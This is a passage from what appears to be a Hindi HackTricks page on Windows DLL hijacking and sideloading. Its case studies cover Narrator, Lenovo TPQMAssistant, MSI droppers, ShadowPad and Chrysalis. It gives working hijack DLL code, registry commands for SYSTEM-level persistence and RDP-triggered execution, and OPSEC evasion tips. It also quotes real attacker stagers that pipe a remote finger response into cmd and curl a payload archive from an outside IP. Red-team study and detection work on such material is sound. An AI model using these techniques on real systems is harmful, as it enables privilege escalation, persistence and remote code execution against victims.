#include<windows.h> #include<stdlib.h> #include<stdio.h>

void Entry (){ //Default function that is executed when the DLL is loaded system(“cmd”); }

BOOL APIENTRY DllMain (HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch (ul_reason_for_call){ case DLL_PROCESS_ATTACH: CreateThread(0,0, (LPTHREAD_START_ROUTINE)Entry,0,0,0); break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DEATCH: break; } return TRUE; }

</details>

## केस स्टडी: Narrator OneCore TTS Localization DLL Hijack (Accessibility/ATs)

Windows Narrator.exe अभी भी स्टार्ट पर एक अनुमानित, भाषा-विशेष localization DLL को प्रोब करता है जिसे hijack करके arbitrary code execution और persistence हासिल किया जा सकता है।

Key facts
- Probe path (current builds): `%windir%\System32\speech_onecore\engines\tts\msttsloc_onecoreenus.dll` (EN-US).
- Legacy path (older builds): `%windir%\System32\speech\engine\tts\msttslocenus.dll`.
- यदि OneCore path पर एक writable attacker-controlled DLL मौजूद है, तो वह लोड होता है और `DllMain(DLL_PROCESS_ATTACH)` executes होता है। No exports are required.

Discovery with Procmon
- Filter: `Process Name is Narrator.exe` and `Operation is Load Image` or `CreateFile`.
- Narrator शुरू करें और ऊपर दिए गए path के लोड के प्रयास को देखें।

Minimal DLL
```c
// Build as msttsloc_onecoreenus.dll and place in the OneCore TTS path
BOOL WINAPI DllMain(HINSTANCE h, DWORD r, LPVOID) {
if (r == DLL_PROCESS_ATTACH) {
// Optional OPSEC: DisableThreadLibraryCalls(h);
// Suspend/quiet Narrator main thread, then run payload
// (see PoC for implementation details)
}
return TRUE;
}

OPSEC मौनता

• एक naive hijack UI को बोलने/हाइलाइट करने पर मजबूर करेगा। चुप रहने के लिए, attach होने पर Narrator थ्रेड्स की enumeration करें, मुख्य थ्रेड खोलें (OpenThread(THREAD_SUSPEND_RESUME)) और उसे SuspendThread करें; अपनी थ्रेड में जारी रखें। पूर्ण कोड के लिए PoC देखें।

Trigger and persistence via Accessibility configuration

• User context (HKCU): reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility" /v configuration /t REG_SZ /d "Narrator" /f
• Winlogon/SYSTEM (HKLM): reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility" /v configuration /t REG_SZ /d "Narrator" /f
• ऊपर दिए गए सेटिंग के साथ, Narrator शुरू करने पर प्लांट की गई DLL लोड होती है। secure desktop (logon screen) पर CTRL+WIN+ENTER दबाकर Narrator शुरू करें; आपकी DLL secure desktop पर SYSTEM के रूप में चलती है।

RDP-triggered SYSTEM execution (lateral movement)

• Allow classic RDP security layer: reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0 /f
• RDP to the host, at the logon screen press CTRL+WIN+ENTER to launch Narrator; your DLL executes as SYSTEM on the secure desktop.
• Execution तब बंद हो जाता है जब RDP session बंद हो—तुरंत inject/migrate करें।

Bring Your Own Accessibility (BYOA)

• आप एक built-in Accessibility Tool (AT) registry entry (e.g., CursorIndicator) क्लोन कर सकते हैं, उसे किसी arbitrary binary/DLL की ओर पॉइंट करने के लिए edit करें, import करें, फिर configuration को उस AT नाम पर सेट करें। यह Accessibility framework के तहत arbitrary execution को proxy करता है।

Notes

• %windir%\System32 के अंतर्गत लिखना और HKLM मान बदलना admin rights की आवश्यकता रखता है।
• सभी payload logic DLL_PROCESS_ATTACH में रह सकती है; कोई exports आवश्यक नहीं हैं।

Case Study: CVE-2025-1729 - Privilege Escalation Using TPQMAssistant.exe

This case demonstrates Phantom DLL Hijacking in Lenovo’s TrackPoint Quick Menu (TPQMAssistant.exe), tracked as CVE-2025-1729.

Vulnerability Details

• Component: TPQMAssistant.exe स्थित है C:\ProgramData\Lenovo\TPQM\Assistant\.
• Scheduled Task: Lenovo\TrackPointQuickMenu\Schedule\ActivationDailyScheduleTask रोजाना 9:30 AM पर चलता है और logged-on user के context में चलता है।
• Directory Permissions: CREATOR OWNER द्वारा writable है, जिससे local users arbitrary files डाल सकते हैं।
• DLL Search Behavior: सबसे पहले अपने working directory से hostfxr.dll लोड करने का प्रयास करता है और अगर गायब है तो “NAME NOT FOUND” लॉग करता है, जो स्थानीय डायरेक्टरी खोज की प्राथमिकता को दर्शाता है।

Exploit Implementation

एक attacker उसी डायरेक्टरी में एक malicious hostfxr.dll stub रख सकता है, और missing DLL का फायदा उठाकर user’s context में code execution प्राप्त कर सकता है:

#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD fdwReason, LPVOID lpReserved) {
if (fdwReason == DLL_PROCESS_ATTACH) {
// Payload: display a message box (proof-of-concept)
MessageBoxA(NULL, "DLL Hijacked!", "TPQM", MB_OK);
}
return TRUE;
}

आक्रमण प्रवाह

1. एक सामान्य उपयोगकर्ता के रूप में, hostfxr.dll को C:\ProgramData\Lenovo\TPQM\Assistant\ में रखें।
2. निर्धारित टास्क के वर्तमान उपयोगकर्ता के संदर्भ में सुबह 9:30 बजे चलने की प्रतीक्षा करें।
3. यदि टास्क के निष्पादन के समय प्रशासक लॉग इन है, तो दुर्भावनापूर्ण DLL प्रशासक के सत्र में medium integrity पर चलती है।
4. मध्यम integrity से SYSTEM privileges तक उन्नत करने के लिए मानक UAC bypass तकनीकों को श्रृंखला में जोड़ें।

केस स्टडी: MSI CustomAction Dropper + DLL Side-Loading via Signed Host (wsc_proxy.exe)

Threat actors अक्सर MSI-आधारित droppers को DLL side-loading के साथ जोड़ते हैं ताकि payloads को एक trusted, signed process के तहत निष्पादित किया जा सके।

श्रृंखला अवलोकन

• उपयोगकर्ता MSI डाउनलोड करता है। GUI install के दौरान एक CustomAction चुपचाप चलता है (जैसे LaunchApplication या VBScript action), जो embedded resources से अगले चरण का पुनर्निर्माण करता है।
• Dropper उसी डायरेक्टरी में एक वैध, signed EXE और एक malicious DLL लिखता है (उदा.: Avast-signed wsc_proxy.exe + attacker-controlled wsc.dll)।
• जब signed EXE शुरू होता है, Windows DLL search order पहले working directory से wsc.dll लोड करता है, जिससे attacker का कोड signed parent के अंतर्गत चल जाता है (ATT&CK T1574.001)。

MSI विश्लेषण (क्या ढूँढना है)

• CustomAction table:
• ऐसे एंट्रीज़ ढूंढें जो executables या VBScript चलाती हों। उदाहरण संदिग्ध पैटर्न: LaunchApplication जो बैकग्राउंड में एक embedded file को execute कर रहा हो।
• Orca (Microsoft Orca.exe) में, CustomAction, InstallExecuteSequence और Binary tables का निरीक्षण करें।
• MSI CAB में embedded/split payloads:
• Administrative extract: msiexec /a package.msi /qb TARGETDIR=C:\out
• Or use lessmsi: lessmsi x package.msi C:\out
• ऐसे कई छोटे fragments ढूँढें जिन्हें VBScript CustomAction द्वारा concatenated और decrypted किया जाता है। सामान्य प्रवाह:

' VBScript CustomAction (high level)
' 1) Read multiple fragment files from the embedded CAB (e.g., f0.bin, f1.bin, ...)
' 2) Concatenate with ADODB.Stream or FileSystemObject
' 3) Decrypt using a hardcoded password/key
' 4) Write reconstructed PE(s) to disk (e.g., wsc_proxy.exe and wsc.dll)

Practical sideloading with wsc_proxy.exe

• इन दोनों फाइलों को एक ही फ़ोल्डर में रखें:
• wsc_proxy.exe: वैध रूप से साइन किया गया होस्ट (Avast). यह प्रक्रिया अपने डायरेक्टरी से नाम के आधार पर wsc.dll लोड करने का प्रयास करती है।
• wsc.dll: attacker DLL. यदि किसी विशिष्ट exports की आवश्यकता नहीं है, तो DllMain पर्याप्त हो सकता है; अन्यथा, एक proxy DLL बनाएं और DllMain में payload चलाते हुए आवश्यक exports को मूल लाइब्रेरी को फॉरवर्ड करें।
• एक न्यूनतम DLL payload बनाएं:

// x64: x86_64-w64-mingw32-gcc payload.c -shared -o wsc.dll
#include <windows.h>
BOOL WINAPI DllMain(HINSTANCE h, DWORD r, LPVOID) {
if (r == DLL_PROCESS_ATTACH) {
WinExec("cmd.exe /c whoami > %TEMP%\\wsc_sideload.txt", SW_HIDE);
}
return TRUE;
}

• निर्यात आवश्यकताओं के लिए, एक प्रॉक्सिंग फ़्रेमवर्क (उदा., DLLirant/Spartacus) का उपयोग करें ताकि एक forwarding DLL जनरेट हो जो आपका payload भी execute करे।

• यह तकनीक host binary द्वारा DLL नाम समाधान (name resolution) पर निर्भर करती है। अगर host absolute paths या safe loading फ़्लैग्स (उदा., LOAD_LIBRARY_SEARCH_SYSTEM32/SetDefaultDllDirectories) का उपयोग करता है तो hijack विफल हो सकता है।

• KnownDLLs, SxS, और forwarded exports precedence को प्रभावित कर सकते हैं और इन्हें host binary और export सेट चुनते समय ध्यान में रखना चाहिए।

साइन किए गए त्रि-फाइल सेट + एन्क्रिप्टेड payloads (ShadowPad केस स्टडी)

Check Point ने बताया कि Ink Dragon कैसे ShadowPad को deploy करता है—एक three-file triad का इस्तेमाल करते हुए ताकि यह वैध सॉफ़्टवेयर में मिल जाए और core payload डिस्क पर एन्क्रिप्टेड रहे:

1. Signed host EXE – AMD, Realtek, या NVIDIA जैसे vendors की बाइनरीज़ का दुरुपयोग (vncutil64.exe, ApplicationLogs.exe, msedge_proxyLog.exe). attackers executable का नाम बदलते हैं ताकि वह Windows बाइनरी जैसा दिखे (उदा. conhost.exe), पर Authenticode signature वैध बनी रहती है।
2. Malicious loader DLL – EXE के बगल में अपेक्षित नाम के साथ ड्रॉप की जाती है (vncutil64loc.dll, atiadlxy.dll, msedge_proxyLogLOC.dll). DLL आमतौर पर ScatterBrain framework से obfuscated MFC बाइनरी होती है; इसका एकमात्र काम encrypted blob ढूंढना, उसे decrypt करना, और ShadowPad को reflectively map करना है।
3. Encrypted payload blob – अक्सर उसी डायरेक्टरी में <name>.tmp के रूप में स्टोर किया जाता है। decrypted payload को memory-map करने के बाद loader TMP फ़ाइल को forensic सबूत नष्ट करने के लिए डिलीट कर देता है।

Tradecraft notes:

• साइन किए गए EXE का नाम बदलना (जबकि PE header में OriginalFileName को बरकरार रखा गया हो) उसे Windows बाइनरी की तरह छिपाने देता है पर vendor signature को बनाए रखता है, इसलिए Ink Dragon की आदत की नकल करें कि वे conhost.exe-जैसी दिखने वाली बाइनरीज़ छोड़ते हैं जो असल में AMD/NVIDIA utilities होती हैं।
• चूंकि executable trusted बनी रहती है, अधिकांश allowlisting controls को सामान्यतः केवल आपके malicious DLL का उसके साथ होना ही चाहिए। loader DLL को अनुकूलित करने पर ध्यान दें; signed parent प्रायः बिना परिवर्तन के चल सकती है।
• ShadowPad का decryptor अपेक्षा करता है कि TMP blob loader के बगल में मौजूद हो और writable हो ताकि mapping के बाद फ़ाइल को zero किया जा सके। payload लोड होने तक डायरेक्टरी writable रखें; एक बार memory में होने पर TMP फ़ाइल OPSEC के लिए सुरक्षित रूप से डिलीट की जा सकती है।

LOLBAS stager + staged archive sideloading chain (finger → tar/curl → WMI)

Operators DLL sideloading को LOLBAS के साथ जोड़ते हैं ताकि disk पर केवल malicious DLL ही कस्टम आर्टिफ़ैक्ट रहे, और trusted EXE के बगल में रखा जाए:

• Remote command loader (Finger): Hidden PowerShell cmd.exe /c spawn करता है, Finger server से commands खींचता है, और उन्हें cmd को pipe करता है:

powershell.exe Start-Process cmd -ArgumentList '/c finger Galo@91.193.19.108 | cmd' -WindowStyle Hidden

• finger user@host TCP/79 पर text खींचता है; | cmd सर्वर रिस्पॉन्स को execute कर देता है, जिससे operators second-stage server-side बदल सकते हैं।

• Built-in download/extract: एक archive को benign extension के साथ डाउनलोड करें, उसे अनपैक करें, और sideload target + DLL को किसी random %LocalAppData% फ़ोल्डर में stage करें:

$base = "$Env:LocalAppData"; $dir = Join-Path $base (Get-Random); curl -s -L -o "$dir.pdf" 79.141.172.212/tcp; mkdir "$dir"; tar -xf "$dir.pdf" -C "$dir"; $exe = "$dir\intelbq.exe"

• curl -s -L progress छुपाता है और redirects को follow करता है; tar -xf Windows के built-in tar का उपयोग करता है।

• WMI/CIM launch: EXE को WMI के माध्यम से स्टार्ट करें ताकि telemetry में एक CIM-created process दिखे जबकि वह colocated DLL लोड करता है:

Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = "`"$exe`""}

• यह उन बाइनरीज़ के साथ काम करता है जो local DLLs को प्राथमिकता देती हैं (उदा., intelbq.exe, nearby_share.exe); payload (उदा., Remcos) trusted नाम के तहत चलता है।

• Hunting: /p, /m, और /c एक साथ दिखाई देने पर forfiles पर alert करें; admin scripts के बाहर यह असामान्य होता है।

केस स्टडी: NSIS dropper + Bitdefender Submission Wizard sideload (Chrysalis)

एक हालिया Lotus Blossom intrusion ने trusted update chain का दुरुपयोग करके NSIS-packed dropper भेजा जिसने DLL sideload और पूरी तरह in-memory payloads स्टेज किए।

Tradecraft flow

• update.exe (NSIS) %AppData%\Bluetooth बनाता है, उसे HIDDEN Mark करता है, एक renamed Bitdefender Submission Wizard BluetoothService.exe, एक malicious log.dll, और एक encrypted blob BluetoothService ड्रॉप करता है, फिर EXE लॉन्च करता है।
• Host EXE log.dll को import करता है और LogInit/LogWrite को कॉल करता है। LogInit blob को mmap-load करता है; LogWrite इसे custom LCG-based stream (constants 0x19660D / 0x3C6EF35F, key material पिछले hash से निकला हुआ) से decrypt करता है, buffer को plaintext shellcode से overwrite करता है, temps free करता है, और उस पर jump करता है।
• IAT से बचने के लिए loader export नामों को hash करके APIs resolve करता है उपयोग करते हुए FNV-1a basis 0x811C9DC5 + prime 0x1000193, फिर Murmur-style avalanche (0x85EBCA6B) लागू करके salted target hashes से तुलना करता है।

मुख्य shellcode (Chrysalis)

• एक PE-जैसी main module को decrypt करता है add/XOR/sub को key gQ2JR&9; के साथ पांच पास दोहराकर, फिर import resolution खत्म करने के लिए dynamically Kernel32.dll → GetProcAddress लोड करता है।
• रनटाइम में DLL नाम strings को per-character bit-rotate/XOR transforms के माध्यम से reconstruct करता है, फिर oleaut32, advapi32, shlwapi, user32, wininet, ole32, shell32 लोड करता है।
• दूसरा resolver उपयोग करता है जो PEB → InMemoryOrderModuleList को वॉक करता है, प्रत्येक export table को 4-बाइट ब्लॉकों में Murmur-style mixing से पार्स करता है, और केवल तब GetProcAddress पर fallback करता है जब hash न मिले।

Embedded configuration & C2

• Config ड्रॉप किए गए BluetoothService फ़ाइल के अंदर offset 0x30808 पर रहता है (size 0x980) और इसे key qwhvb^435h&*7 से RC4-decrypt किया जाता है, जिससे C2 URL और User-Agent प्रकट होते हैं।
• Beacons एक dot-delimited host profile बनाते हैं, tag 4Q prepend करते हैं, फिर vAuig34%^325hGV key से RC4-encrypt करके HTTPS पर HttpSendRequestA के जरिए भेजते हैं। Responses RC4-decrypt होते हैं और tag switch द्वारा dispatch होते हैं (4T shell, 4V process exec, 4W/4X file write, 4Y read/exfil, 4\\ uninstall, 4 drive/file enum + chunked transfer cases)।
• Execution mode CLI args से gated है: कोई args नहीं = persistence install (service/Run key) pointing to -i; -i self को -k के साथ relaunch करता है; -k install skip करके payload चलाता है।

Alternate loader observed

• उसी intrusion ने Tiny C Compiler ड्रॉप किया और C:\ProgramData\USOShared\ से svchost.exe -nostdlib -run conf.c execute किया, जिसके बगल में libtcc.dll था। हमलावर द्वारा सप्लाई किया गया C source embedded shellcode था, जिसे compile करके in-memory चलाया गया बिना PE डिस्क पर छोड़े। Replicate with:

C:\ProgramData\USOShared\tcc.exe -nostdlib -run conf.c

• यह TCC-आधारित compile-and-run stage ने runtime पर Wininet.dll को import किया और एक hardcoded URL से second-stage shellcode को खींचा, जिससे एक लचीला loader बनता है जो एक compiler run के रूप में छुपता है।

संदर्भ

• Red Canary – Intelligence Insights: January 2026
• CVE-2025-1729 - Privilege Escalation Using TPQMAssistant.exe
• Microsoft Store - TPQM Assistant UWP
• https://medium.com/@pranaybafna/tcapt-dll-hijacking-888d181ede8e
• https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html
• Check Point Research – Nimbus Manticore Deploys New Malware Targeting Europe
• TrustedSec – Hack-cessibility: When DLL Hijacks Meet Windows Helpers
• PoC – api0cradle/Narrator-dll
• Sysinternals Process Monitor
• Unit 42 – Digital Doppelgangers: Anatomy of Evolving Impersonation Campaigns Distributing Gh0st RAT
• Check Point Research – Inside Ink Dragon: Revealing the Relay Network and Inner Workings of a Stealthy Offensive Operation
• Rapid7 – The Chrysalis Backdoor: A Deep Dive into Lotus Blossom’s toolkit
• 0xdf – HTB Bruno ZipSlip → DLL hijack chain

Tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें

• सदस्यता योजनाओं की जांच करें!
• हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमें Twitter 🐦 @hacktricks_live** पर फॉलो करें।**
• हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।